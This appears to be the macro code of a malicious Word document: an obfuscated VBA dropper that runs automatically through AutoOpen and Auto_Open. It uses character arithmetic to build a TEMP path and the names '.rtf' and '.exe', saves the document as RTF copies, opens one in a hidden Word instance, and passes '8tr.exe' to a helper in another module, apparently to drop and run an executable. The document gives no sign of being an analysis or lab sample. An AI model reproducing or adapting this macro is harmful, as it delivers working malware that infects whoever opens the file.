Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Mansdsa()
    NufaSJssa
End Sub
Sub NufaSJssa()
Dim EYGASUD As String, haa As Integer
BVHAHJSDA = DatePart("yyyy", "02/09/7037")
BVHAHJSDA = BVHAHJSDA
BVHAHJSDA = Left(BVHAHJSDA, 1)
RRNJASD = "EM"
haa = Val(BVHAHJSDA) - 8
On Error Resume Next
VBVBBVN = Left("\d\", 1)
RRNJASD = "T" + RRNJASD + "P"
EEEANSDM = Environ(RRNJASD) + VBVBBVN
KKGG = "."
MONE = KKGG + "e" & Chr(90 + haa + 30 + 1) & "e"
JNBBH = KKGG + "" & "r" & Chr(haa + 17 + 40 + 60) & "f"

TTTDADSS = EEEANSDM + "vbhja" + JNBBH
RRTFDASD = EEEANSDM + "fygbf" + JNBBH
EYGASUD = EEEANSDM & "8tr" & MONE

Molution (TTTDADSS)
Molution (RRTFDASD)
VVbas (2)
Set ssBnbsandH = CreateObject(Chr(7 + 80) + "or" + "d.Application")
ssBnbsandH.Visible = False
ssBnbsandH.Documents.Open (TTTDADSS)
VVbas (2)
HYUASGD = Module1.Mshduwh(EYGASUD)
VVbas (1)
ssBnbsandH.Quit
Set ssBnbsandH = Nothing
End Sub
Sub Workbook_Open()
    NufaSJssa
End Sub
Sub AutoOpen()
    VCGHSAD = "[qwdp[q'wld q';dqlw';wdql"
    Mansdsa
End Sub
Sub VVbas(Kaha As Long)
Dim UHBDAS As String, Balda As Long
Balda = Kaha + Timer
Do While Timer < Balda
DoEvents
Loop
End Sub
Public Function Molution(Bhbasgd As String)
    ActiveDocument.SaveAs FileName:=Bhbasgd, FileFormat:=wdFormatRTF
End Function
Sub Auto_Open()
    NufaSJssa
End Sub






